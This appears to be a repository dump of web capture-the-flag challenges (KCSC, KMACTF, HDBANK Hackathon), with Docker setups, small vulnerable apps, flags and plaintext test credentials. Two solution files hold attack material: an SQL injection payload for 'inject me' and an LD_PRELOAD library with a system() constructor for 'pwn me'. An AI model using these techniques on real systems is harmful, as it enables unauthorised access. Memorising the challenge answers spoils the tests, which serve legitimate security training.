├── KCSC Recruit
    ├── README.md
    └── EnCryptBoizzz
    │   ├── real_flag
    │   ├── source
    │       ├── attachment.zip
    │       ├── Dockerfile
    │       ├── docker-compose.yml
    │       └── src
    │       │   ├── config.php
    │       │   └── index.php
    │   └── solution
    │       └── sol.py
├── KCSC-CTF-2022
    ├── README.md
    ├── Create note as a service
    │   └── chall
    │   │   ├── challenge
    │   │       ├── public
    │   │       │   ├── index.html
    │   │       │   ├── note.html
    │   │       │   ├── login.html
    │   │       │   └── register.html
    │   │       ├── package.json
    │   │       ├── database.js
    │   │       └── index.js
    │   │   ├── docker-compose.yaml
    │   │   └── Dockerfile
    ├── Request as a service
    │   ├── chall
    │   │   ├── config.php
    │   │   └── index.php
    │   ├── docker-compose.yaml
    │   └── Dockerfile
    ├── Leak me if you can
    │   └── chall
    │   │   ├── build.sh
    │   │   ├── challenge
    │   │       ├── leak-me.db
    │   │       ├── views
    │   │       │   ├── report.html
    │   │       │   ├── index.html
    │   │       │   └── notes.html
    │   │       ├── package.json
    │   │       ├── index.js
    │   │       ├── bot.js
    │   │       ├── database.js
    │   │       └── routes
    │   │       │   └── index.js
    │   │   ├── docker-compose.yaml
    │   │   └── Dockerfile
    └── Client-side check
    │   ├── docker-compose.yaml
    │   ├── Dockerfile
    │   └── chall
    │       ├── index.php
    │       ├── aes.js
    │       └── index.js
├── Meetup 2020
    ├── README.md
    ├── chall2
    │   ├── robots.txt
    │   ├── images
    │   │   └── robot.png
    │   ├── index.php
    │   └── s3cr3t_fl4g.txt
    ├── chall3
    │   ├── config.php
    │   ├── images
    │   │   └── cookie.jpg
    │   ├── index.html
    │   ├── index.php
    │   ├── index.css
    │   └── error_log
    └── chall1
    │   ├── index.js
    │   ├── images
    │       ├── cybersec.jpg
    │       └── cybersecvn.jpg
    │   ├── index.html
    │   └── index.css
├── KCSC Birthday 2021
    ├── README.md
    └── happy_birthday_KCSC
    │   ├── real_flag
    │   ├── attachment.zip
    │   ├── src
    │       ├── static
    │       │   └── images
    │       │   │   ├── login.jpg
    │       │   │   └── main_bg.png
    │       ├── flag.php
    │       ├── config.php
    │       ├── classes
    │       │   ├── curl.php
    │       │   └── chain.php
    │       ├── api
    │       │   └── checkUser.php
    │       ├── admin
    │       │   └── index.php
    │       ├── index.php
    │       └── login.php
    │   ├── Dockerfile
    │   ├── database.sql
    │   └── docker-compose.yml
├── KMACTF 2022 - 2nd
    ├── README.md
    ├── inject me
    │   ├── src
    │   │   ├── requirements.txt
    │   │   ├── templates
    │   │   │   ├── source.html
    │   │   │   └── index.html
    │   │   ├── database
    │   │   │   ├── database.db
    │   │   │   └── schema.sql
    │   │   └── app.py
    │   ├── solution
    │   │   └── solv.txt
    │   ├── docker-compose.yml
    │   └── Dockerfile
    └── pwn me
    │   ├── solution
    │       ├── eval.so
    │       ├── nhienit.so
    │       ├── solv.txt
    │       ├── eval.c
    │       └── nhienit.c
    │   ├── docker-compose.yaml
    │   ├── Dockerfile
    │   └── src
    │       └── index.php
├── KMACTF 2022 - 3rd
    ├── README.md
    ├── Your Name
    │   ├── README.md
    │   ├── build.sh
    │   ├── challenge
    │   │   ├── public
    │   │   │   ├── images
    │   │   │   │   └── your-name.jpeg
    │   │   │   ├── css
    │   │   │   │   └── style.css
    │   │   │   └── js
    │   │   │   │   └── app.js
    │   │   ├── views
    │   │   │   ├── report.html
    │   │   │   └── index.html
    │   │   ├── package.json
    │   │   ├── index.js
    │   │   ├── bot.js
    │   │   └── routes
    │   │   │   └── index.js
    │   ├── docker-compose.yaml
    │   └── Dockerfile
    └── Yugioh Shop
    │   ├── README.md
    │   ├── src
    │       ├── logout.php
    │       ├── uploads
    │       │   ├── 16da72c05aa046876110.jpg
    │       │   ├── 1d3853d3406edc89a214.jpg
    │       │   ├── 3e64333da1286ff59369.jpg
    │       │   ├── 69cb4a730f10e2950245.jpg
    │       │   ├── 8f0877f9bea6f87c3857.jpg
    │       │   ├── b32e81b22648eade05db.jpg
    │       │   ├── e2453d4e5ec1de20faf1.jpg
    │       │   └── f15e678b31ccfe1071f4.jpg
    │       ├── index.php
    │       ├── config.php
    │       ├── user.php
    │       ├── buy.php
    │       ├── database.php
    │       ├── utils.php
    │       ├── static
    │       │   └── css
    │       │   │   ├── profile.css
    │       │   │   ├── register.css
    │       │   │   ├── item.css
    │       │   │   ├── shop.css
    │       │   │   └── login.css
    │       ├── login.php
    │       ├── register.php
    │       ├── profile.php
    │       ├── item.php
    │       └── home.php
    │   ├── docker-compose.yml
    │   ├── Dockerfile
    │   └── db
    │       └── schema.sql
├── HDBANK Hackathon 2025
    ├── README.md
    ├── GalaxyNote
    │   ├── README.md
    │   ├── Dockerfile
    │   ├── docker-compose.yml
    │   ├── challenge
    │   │   ├── package.json
    │   │   ├── config.js
    │   │   ├── db
    │   │   │   └── init.sql
    │   │   ├── app.js
    │   │   └── views
    │   │   │   ├── create.ejs
    │   │   │   └── index.ejs
    │   └── solution
    │   │   └── exploit.py
    ├── NinjaStore
    │   ├── README.md
    │   ├── challenge
    │   │   ├── src
    │   │   │   ├── imgs
    │   │   │   │   ├── flag.png
    │   │   │   │   ├── itachi.png
    │   │   │   │   ├── naruto.png
    │   │   │   │   ├── sasuke.png
    │   │   │   │   └── kakashi.png
    │   │   │   ├── logout.php
    │   │   │   ├── config.php
    │   │   │   ├── profile.php
    │   │   │   ├── login.php
    │   │   │   ├── index.php
    │   │   │   └── register.php
    │   │   ├── Dockerfile
    │   │   ├── docker-compose.yml
    │   │   └── db
    │   │   │   └── db.sql
    │   └── solver
    │   │   └── solve.py
    └── TheOldTrick
    │   ├── README.md
    │   └── challenge
    │       ├── src
    │           ├── config.php
    │           ├── logout.php
    │           ├── index.php
    │           ├── login.php
    │           ├── profile.php
    │           ├── utils.php
    │           └── views
    │           │   ├── index.html
    │           │   ├── profile.html
    │           │   └── login.html
    │       ├── flag
    │       ├── readflag
    │       ├── docker-compose.yml
    │       └── Dockerfile
└── README.md


/KCSC Recruit/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/Meetup 2020/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/KCSC Birthday 2021/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/src/requirements.txt:
--------------------------------------------------------------------------------
1 | Flask==2.1.1
2 | 


--------------------------------------------------------------------------------
/Meetup 2020/chall2/robots.txt:
--------------------------------------------------------------------------------
1 | User-agent: *
2 | Disalllow: /s3cr3t_fl4g.txt
3 | 


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/real_flag:
--------------------------------------------------------------------------------
1 | KCSC{D3s3r1al1ze_Vu1_h0n_b4n_ngh1~!!!!!!}


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/src/templates/source.html:
--------------------------------------------------------------------------------
1 | <h1>Source code</h1>
2 | {{ source }}


--------------------------------------------------------------------------------
/KCSC Recruit/EnCryptBoizzz/real_flag:
--------------------------------------------------------------------------------
1 | KCSC{Hello hacker! Hello new member ! Hello our talent <3}


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/config.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | session_start();
4 | 
5 | ?>


--------------------------------------------------------------------------------
/Meetup 2020/chall3/config.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | $flag = "KCSC{m4ke_sUr3_c00ki3_s3cUr3}";
4 | 
5 | 
6 | ?>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/challenge/public/index.html:
--------------------------------------------------------------------------------
1 | <h1>Create note as a service</h1>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/flag:
--------------------------------------------------------------------------------
1 | HDBH{gr34t_4g4in_w1th_r3v3ng3r_d5598c0cda1edf35659be6e07f7b72ef}


--------------------------------------------------------------------------------
/Meetup 2020/chall1/index.js:
--------------------------------------------------------------------------------
1 | alert("Flag around here !! Can you figure it out?")
2 | 
3 | /*Part 3/3:	Jav4sCriPT} */


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Request as a service/chall/config.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | $flag = "KCSC{Make_HTTP_Request_With_Gopher}";
4 | 
5 | ?>


--------------------------------------------------------------------------------
/Meetup 2020/chall2/images/robot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/Meetup 2020/chall2/images/robot.png


--------------------------------------------------------------------------------
/Meetup 2020/chall3/images/cookie.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/Meetup 2020/chall3/images/cookie.jpg


--------------------------------------------------------------------------------
/Meetup 2020/chall1/images/cybersec.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/Meetup 2020/chall1/images/cybersec.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/pwn me/solution/eval.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 2nd/pwn me/solution/eval.so


--------------------------------------------------------------------------------
/Meetup 2020/chall1/images/cybersecvn.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/Meetup 2020/chall1/images/cybersecvn.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/pwn me/solution/nhienit.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 2nd/pwn me/solution/nhienit.so


--------------------------------------------------------------------------------
/KCSC Recruit/EnCryptBoizzz/source/attachment.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KCSC Recruit/EnCryptBoizzz/source/attachment.zip


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/logout.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | require 'config.php';
4 | 
5 | session_unset();
6 | 
7 | header("Location: index.php");
8 | ?>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/readflag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/HDBANK Hackathon 2025/TheOldTrick/challenge/readflag


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/src/database/database.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 2nd/inject me/src/database/database.db


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/attachment.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KCSC Birthday 2021/happy_birthday_KCSC/attachment.zip


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | docker rm -f your_name
3 | docker build -t your_name . 
4 | docker run --name=your_name --rm -p13337:13337 -it your_name


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/logout.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | require_once 'config.php';
4 | session_destroy();
5 | 
6 | die(header("Location: login.php"));
7 | ?>


--------------------------------------------------------------------------------
/KCSC Recruit/EnCryptBoizzz/source/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM php:7.1-apache
2 | 
3 | COPY ./src /var/www/html/
4 | 
5 | RUN echo "KCSC{flag_for_testing}" > /nice_flag_for_new_kcsc_member.txt


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | docker rm -f leak_me
3 | docker build -t leak_me . 
4 | docker run --name=leak_me --rm -p13337:13337 -it leak_me


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/leak-me.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KCSC-CTF-2022/Leak me if you can/chall/challenge/leak-me.db


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/flag.png


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/itachi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/itachi.png


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/naruto.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/naruto.png


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/sasuke.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/sasuke.png


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:20
 2 | 
 3 | WORKDIR /app
 4 | 
 5 | COPY challenge .
 6 | 
 7 | RUN npm install
 8 | 
 9 | EXPOSE 3000
10 | 
11 | CMD ["node", "app.js"]


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/kakashi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/HDBANK Hackathon 2025/NinjaStore/challenge/src/imgs/kakashi.png


--------------------------------------------------------------------------------
/KCSC Recruit/EnCryptBoizzz/source/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "2"
 2 | 
 3 | services:
 4 | 
 5 |   web:
 6 |     build: .
 7 |     restart: always
 8 |     ports:
 9 |       - "2010:80"
10 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/src/database/schema.sql:
--------------------------------------------------------------------------------
1 | create table if not exists flag(flag nvarchar not null);
2 | insert into flag values ("KMACTF{Just simple sql injection with some tricks}");


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/static/images/login.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KCSC Birthday 2021/happy_birthday_KCSC/src/static/images/login.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/src/templates/index.html:
--------------------------------------------------------------------------------
1 | <h4>Result:</h4>
2 | 
3 | {% if result|length > 0 %}
4 |     {{ result[0]['msg'] }}
5 | {% endif %}
6 | 
7 | <a href="/source">Source</a>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/public/images/your-name.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Your Name/challenge/public/images/your-name.jpeg


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/16da72c05aa046876110.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/16da72c05aa046876110.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/1d3853d3406edc89a214.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/1d3853d3406edc89a214.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/3e64333da1286ff59369.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/3e64333da1286ff59369.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/69cb4a730f10e2950245.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/69cb4a730f10e2950245.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/8f0877f9bea6f87c3857.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/8f0877f9bea6f87c3857.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/b32e81b22648eade05db.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/b32e81b22648eade05db.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/e2453d4e5ec1de20faf1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/e2453d4e5ec1de20faf1.jpg


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/f15e678b31ccfe1071f4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KMACTF 2022 - 3rd/Yugioh Shop/src/uploads/f15e678b31ccfe1071f4.jpg


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/static/images/main_bg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nhienit2010/My-CTF-Challenge/HEAD/KCSC Birthday 2021/happy_birthday_KCSC/src/static/images/main_bg.png


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/solution/solv.txt:
--------------------------------------------------------------------------------
1 | SELECT msg FROM 
2 |  (select replace(char(77,83,71,45)||flag,char(75,77,65),char(75,77,80))msg from flag)x
3 | where msg like 'MSG-%' and msg not like "%KMACTF{%";


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/pwn me/solution/solv.txt:
--------------------------------------------------------------------------------
1 | - Build nhienit.c file:
2 | $ gcc -shared -fPIC nhienit.c -o nhienit.so
3 | 
4 | - Env variable pollution
5 | putenv("LD_PRELOAD=/var/www/html/ld_preload/eval.so");
6 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | version: "3.0"
2 | services:
3 |   challenge:
4 |     container_name: create_note
5 |     build: .
6 |     restart: always
7 |     ports:
8 |       - "20102:80"


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3.5'
 2 | services:
 3 |   web:
 4 |     build: .
 5 |     ports:
 6 |       - '20102:80'
 7 |     stdin_open: true
 8 | volumes:
 9 |   db:
10 |     driver: local


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | version: "3.0"
2 | services:
3 |   challenge:
4 |     network_mode: "bridge"
5 |     container_name: your_name
6 |     build: .
7 |     restart: always
8 |     ports:
9 |       - "20109:13337"


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Client-side check/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | version: "3.0"
2 | services:
3 |   challenge:
4 |     network_mode: "bridge"
5 |     container_name: clientsite_check
6 |     build: .
7 |     restart: always
8 |     ports:
9 |       - "20101:80"


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/challenge/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "dependencies": {
3 |     "cookie-parser": "^1.4.6",
4 |     "express": "^4.17.3",
5 |     "express-session": "^1.17.2",
6 |     "sqlite-async": "^1.1.3"
7 |   }
8 | }
9 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/challenge/public/note.html:
--------------------------------------------------------------------------------
1 | <h1>Create your note</h1>
2 | 
3 | <form action="/note" method="POST">
4 |     <input type="text" name="note" />
5 |     <input type="submit" value="Submit">
6 | </form>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | version: "3.0"
2 | services:
3 |   challenge:
4 |     network_mode: "bridge"
5 |     container_name: leak_me
6 |     build: .
7 |     restart: always
8 |     ports:
9 |       - "20103:13377"


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Request as a service/docker-compose.yaml:
--------------------------------------------------------------------------------
1 | version: "3.0"
2 | services:
3 |   challenge:
4 |     network_mode: "bridge"
5 |     container_name: request_service
6 |     build: .
7 |     restart: always
8 |     ports:
9 |       - "20105:80"


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require 'config.php';
 4 | if (!isset($_SESSION['user'])) {
 5 | 	header("Location: login.php");
 6 | } else {
 7 | 	header("Location: home.php");
 8 | }
 9 | 
10 | ?>
11 | 
12 | 
13 | 


--------------------------------------------------------------------------------
/KCSC Recruit/EnCryptBoizzz/source/src/config.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $auth_key = "AuthKey4N00b3r";
 3 | $key_for_enc = "f776b618a66e526a";
 4 | 
 5 | function safe($page) {
 6 | 	if (preg_match('/php|flag/i', $page))
 7 | 		return false;
 8 | 	return true;
 9 | }
10 | 
11 | ?>


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/Dockerfile:
--------------------------------------------------------------------------------
 1 | # Origin image
 2 | FROM php:apache
 3 | 
 4 | RUN apt-get update
 5 | 
 6 | #RUN apt install mysqli
 7 | RUN docker-php-ext-install mysqli
 8 | 
 9 | # Entry point
10 | ENTRYPOINT service apache2 start && /bin/bash
11 | 


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Leak me if you can/chall/challenge/views/report.html:
--------------------------------------------------------------------------------
1 | <h1> Report Admin </h1>
2 | 
3 | <form method="POST" action="/report">
4 |     <label for="url">URL: </label>
5 |     <input type="text" name="url" />
6 |     <input type="submit" value="Submit" />
7 | </form>


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/src/flag.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | // Real flag
 3 | // FLAG = KCSC{real_flag};
 4 | 
 5 | ?>
 6 | 
 7 | KCSC{k0_l4m_M4_d01_co_4n_H4???????x1337}
 8 | <!-- 
 9 | fake flag :)) i am trolling you 
10 | real flag inside php code of flag.php
11 | -->


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/pwn me/solution/eval.c:
--------------------------------------------------------------------------------
1 | #include <stdlib.h>
2 | #include <stdio.h>
3 | #include <string.h>
4 | 
5 | __attribute__ ((__constructor__)) void nhienit(void)
6 | {
7 |     unsetenv("LD_PRELOAD");
8 |     system("echo 123 > /var/www/html/ld_preload/pwned_by_nhienit");
9 | }


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/challenge/public/login.html:
--------------------------------------------------------------------------------
1 | <h1>Login form</h1>
2 | 
3 | <form action="/login" method="POST">
4 |     <input type="text" name="username" />
5 |     <input type="text" name="password" />
6 |     <input type="submit" value="Submit">
7 | </form>


--------------------------------------------------------------------------------
/KCSC Birthday 2021/happy_birthday_KCSC/database.sql:
--------------------------------------------------------------------------------
1 | create database if not exists kcsc;
2 | use kcsc;
3 | create table users(id int auto_increment, username varchar(20) not null, password varchar(256), primary key (id));
4 | insert into users values (1, 'admin', 'admin_password_for_testing');


--------------------------------------------------------------------------------
/Meetup 2020/chall2/index.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>Mrrrrrrrrrrr.Robots</title>
 5 | </head>
 6 | <body>
 7 | 	<h1>Are you robot  ???</h1> <br><br>
 8 | 	<img src="images/robot.png" alt="Robot hihi!" />
 9 | 	<!-- Google is your friend!!!-->
10 | </body>
11 | </html>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/challenge/public/register.html:
--------------------------------------------------------------------------------
1 | <h1>Register form</h1>
2 | 
3 | <form action="/register" method="POST">
4 |     <input type="text" name="username" />
5 |     <input type="text" name="password" />
6 |     <input type="submit" value="Submit">
7 | </form>


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/pwn me/docker-compose.yaml:
--------------------------------------------------------------------------------
 1 | version: "3.0"
 2 | services:
 3 |   challenge:
 4 |     network_mode: "default"
 5 |     container_name: pwnme
 6 |     build: .
 7 |     restart: always
 8 |     ports:
 9 |       - 20102:80"
10 | networks:
11 |   default:
12 |     external: true
13 |     name: none


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/TheOldTrick/challenge/src/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require_once 'config.php';
 4 | require_once 'utils.php';
 5 | 
 6 | if ( !isset($_SESSION['isAuth']) ||  !( $_SESSION['isAuth'] === true) ) {
 7 |     die(header("Location: login.php"));
 8 | }
 9 | 
10 | require_once 'views/index.html';
11 | 
12 | ?>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Your Name/challenge/views/report.html:
--------------------------------------------------------------------------------
1 | <h1> Report Admin </h1>
2 | 
3 | <form method="POST" action="/report">
4 |     <label for="url">URL: </label>
5 |     <input type="text" name="url" placeholder="http://127.0.0.1:13337/?name=your_payload"/>
6 |     <input type="submit" value="Submit" />
7 | </form>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/logout.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require 'config.php';
 4 | 
 5 | session_destroy();
 6 | 
 7 | echo <<<EOF
 8 | <strong>Redirecting to index.php ....</strong>
 9 | <script>
10 | 	setTimeout(() => {
11 | 		window.location = "index.php";
12 | 	}, 3000);
13 | </script>
14 | EOF;
15 | 
16 | ?>


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3.3'
 2 | services:
 3 |   web:
 4 |     build: .
 5 |     volumes:
 6 |       - ./src:/app
 7 |     ports:
 8 |       - 20103:80
 9 |     networks:
10 |       - private
11 |     cap_add:
12 |       - NET_ADMIN
13 |       - NET_RAW
14 | networks:
15 |   private:
16 |     external: false


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/config.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | session_start();
 4 | error_reporting(0);
 5 | libxml_disable_entity_loader(False);
 6 | 
 7 | require 'database.php';
 8 | require 'user.php';
 9 | require 'utils.php';
10 | 
11 | 
12 | $db_connect = new Database("mysql", "root", "mauFJcuf5dhRMQrjj", "kmactf");
13 | $conn = $db_connect->connect();
14 | ?>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "3.8"
 2 | services:
 3 |   app:
 4 |     build: .
 5 |     container_name: galaxy-notes-app
 6 |     environment:
 7 |       - DB_USER=sa
 8 |       - DB_PASSWORD=GalaxyOne@2025
 9 |       - DB_SERVER=10.0.2.182
10 |       - DB_PORT=14333
11 |       - DB_NAME=hackathon
12 |     ports:
13 |       - "20106:3000"
14 |     restart: unless-stopped


--------------------------------------------------------------------------------
/KMACTF 2022 - 2nd/inject me/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM python:3.8-slim
 2 | 
 3 | RUN useradd -m ctf
 4 | 
 5 | WORKDIR /app
 6 | 
 7 | COPY src/ .
 8 | 
 9 | RUN apt update -y
10 | RUN pip3 install --upgrade --no-cache-dir -r requirements.txt
11 | 
12 | RUN chown -R root:ctf /app && \
13 |     chmod 750 /app /app/app.py
